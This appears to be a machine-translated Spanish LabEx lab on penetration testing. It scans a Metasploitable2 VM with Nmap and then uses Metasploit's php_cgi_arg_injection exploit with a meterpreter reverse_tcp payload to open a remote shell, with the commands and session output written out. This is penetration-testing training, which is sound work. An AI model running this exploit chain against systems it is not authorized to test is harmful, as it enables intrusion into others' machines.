Realización de Escaneo de Vulnerabilidades y Pruebas de Penetración con Nmap en Kali Linux

NmapNmapBeginner
Practicar Ahora

💡 Este tutorial está traducido por IA desde la versión en inglés. Para ver la versión original, puedes hacer clic aquí

Introducción

En este laboratorio, aprenderás cómo realizar análisis de vulnerabilidades y pruebas de penetración en una máquina objetivo utilizando diversas herramientas en Kali Linux. El objetivo es adquirir experiencia práctica con herramientas populares de análisis de vulnerabilidades y comprender cómo aprovechar los hallazgos para llevar a cabo ataques de penetración exitosos. El laboratorio se llevará a cabo en la plataforma LabEx, donde se te proporcionará un contenedor de Kali Linux como máquina de ataque y una máquina virtual Metasploitable2 como objetivo.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) nmap/NmapGroup -.-> nmap/port_scanning("Port Scanning Methods") nmap/NmapGroup -.-> nmap/host_discovery("Host Discovery Techniques") nmap/NmapGroup -.-> nmap/target_specification("Target Specification") nmap/NmapGroup -.-> nmap/syn_scan("SYN Scan") nmap/NmapGroup -.-> nmap/service_detection("Service Detection") subgraph Lab Skills nmap/port_scanning -.-> lab-416122{{"Realización de Escaneo de Vulnerabilidades y Pruebas de Penetración con Nmap en Kali Linux"}} nmap/host_discovery -.-> lab-416122{{"Realización de Escaneo de Vulnerabilidades y Pruebas de Penetración con Nmap en Kali Linux"}} nmap/target_specification -.-> lab-416122{{"Realización de Escaneo de Vulnerabilidades y Pruebas de Penetración con Nmap en Kali Linux"}} nmap/syn_scan -.-> lab-416122{{"Realización de Escaneo de Vulnerabilidades y Pruebas de Penetración con Nmap en Kali Linux"}} nmap/service_detection -.-> lab-416122{{"Realización de Escaneo de Vulnerabilidades y Pruebas de Penetración con Nmap en Kali Linux"}} end

Configuración del entorno

En este paso, iniciarás el contenedor de Kali Linux y la máquina objetivo Metasploitable2 en la plataforma LabEx.

  1. Abre una terminal xfce en la máquina host de LabEx y inicia la máquina objetivo Metasploitable2 ejecutando el siguiente comando:
sudo virsh start Metasploitable2

Espera a que la máquina objetivo se inicie, puede tardar de 1 a 3 minutos.

  1. Prueba la conectividad a la máquina objetivo mediante un ping:
ping 192.168.122.102

Presiona Ctrl+C para detener el ping.

  1. Inicia el contenedor de Kali Linux y entra al entorno bash ejecutando:
docker run -ti --network host b5b709a49cd5 bash
  1. Dentro del contenedor de Kali, prueba la conexión de red a la máquina objetivo:
ping 192.168.122.102

Presiona Ctrl+C para detener el ping.

Realización de análisis de vulnerabilidades con Nmap

En este paso, aprenderás sobre algunas herramientas populares de análisis de vulnerabilidades disponibles en Kali Linux.

  1. X-scan: X-scan es una conocida herramienta de análisis integral en China. Es completamente gratuita, no requiere instalación y admite interfaces gráficas y de línea de comandos en chino e inglés. X-scan fue desarrollado por un famoso grupo de hackers chinos llamado "Security Focus" y se ha mejorado constantemente desde su versión de prueba interna 0.2 en el año 2000.

  2. Nessus: Nessus es uno de los software de análisis y detección de vulnerabilidades más utilizados en el mundo. Más de 75,000 organizaciones utilizan Nessus para escanear sus sistemas informáticos. Nessus fue creado por Renaud Deraison en 1998 con el objetivo de proporcionar un programa de análisis de seguridad de sistemas remotos gratuito, potente, actualizado con frecuencia y fácil de usar para la comunidad de Internet.

  3. SQLmap: SQLmap es una herramienta de inyección SQL automática que puede escanear, detectar y explotar vulnerabilidades de inyección SQL en una URL dada. Actualmente admite bases de datos MS - SQL, MySQL, Oracle y PostgreSQL. SQLmap emplea cuatro técnicas únicas de inyección SQL: inferencia ciega, consultas UNION, consultas apiladas y inyección ciega basada en tiempo.

  4. Nmap: Nmap es una potente y versátil herramienta de exploración de redes y auditoría de seguridad. Se puede utilizar para diversos fines, incluyendo la descubrimiento de redes, el análisis de puertos y la detección de vulnerabilidades.

Ahora, utilizarás Nmap para realizar un análisis de vulnerabilidades en la máquina objetivo Metasploitable2.

  1. Inicia el servicio de base de datos de Metasploit e inicializa la base de datos:
cd ~
service postgresql start
msfdb init
  1. Inicia la consola de Metasploit:
msfconsole
  1. Dentro de la consola de Metasploit, utiliza el comando nmap para escanear la máquina objetivo:
nmap -sS -T4 192.168.122.102

A continuación, se muestra un ejemplo de la salida que podrías ver:

[*] exec: nmap -sS -T4 192.168.122.102

Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-23 23:15 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0032s latency).
Not shown: 977 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 52:54:00:1E:9E:B4 (QEMU virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

El parámetro -sS realiza un análisis TCP SYN (también conocido como análisis semi - abierto o furtivo), y -T4 establece la política de temporización para ser agresiva pero no demasiado rápida para evitar un tráfico de red excesivo.

  1. Observa la salida del análisis, que debe mostrar los puertos abiertos y los servicios en la máquina objetivo.

Presiona Ctrl+D para salir de la consola de Metasploit y luego inicia la inspección

Explotación de una vulnerabilidad

En este paso, utilizarás la información recopilada del análisis de Nmap para explotar una vulnerabilidad en la máquina objetivo Metasploitable2.

  1. En primer lugar, si no estás en la consola de Metasploit, debes iniciar la consola de Metasploit:
cd ~
msfconsole
  1. A partir de los resultados del análisis de Nmap, identifica un puerto abierto en la máquina objetivo, por ejemplo, el puerto 80. En la consola de Metasploit, busca un módulo de explotación relacionado con el puerto abierto:
search http
  1. Utiliza el módulo de explotación adecuado:
use exploit/multi/http/php_cgi_arg_injection
  1. Establece la dirección IP de la máquina objetivo:
set RHOST 192.168.122.102
  1. Establece la carga útil (payload) a utilizar:
set PAYLOAD php/meterpreter/reverse_tcp
  1. Establece la dirección IP de la máquina local:
set LHOST 192.168.122.1
  1. Ejecuta la explotación:
exploit

A continuación, se muestra un ejemplo de la salida que podrías ver:

[*] Started reverse TCP handler on 192.168.122.1:4444
[*] Sending stage (39927 bytes) to 192.168.122.102
[*] Meterpreter session 1 opened (192.168.122.1:4444 -> 192.168.122.102:38510) at 2024-03-23 23:21:14 +0000
  1. Si la explotación es exitosa, deberías obtener acceso a la shell de la máquina objetivo. Verifica el acceso ejecutando comandos como sysinfo para mostrar información del sistema.

  2. Si tienes tiempo, puedes probar a explorar otras herramientas de análisis de vulnerabilidades como Nessus, SQLmap o X-scan. También puedes intentar explotar diferentes vulnerabilidades en la máquina objetivo Metasploitable2.

Presiona Ctrl+D para salir de la consola de Metasploit y luego inicia la inspección

Resumen

En este laboratorio, aprendiste cómo configurar un entorno de Kali Linux para realizar pruebas de penetración y cómo utilizar herramientas populares de análisis de vulnerabilidades como Nmap para identificar posibles vulnerabilidades en un sistema objetivo. También adquiriste experiencia práctica en la explotación de una vulnerabilidad utilizando el Framework Metasploit. Este conocimiento práctico te ayudará a comprender la importancia del análisis de vulnerabilidades y las pruebas de penetración en el campo de la ciberseguridad.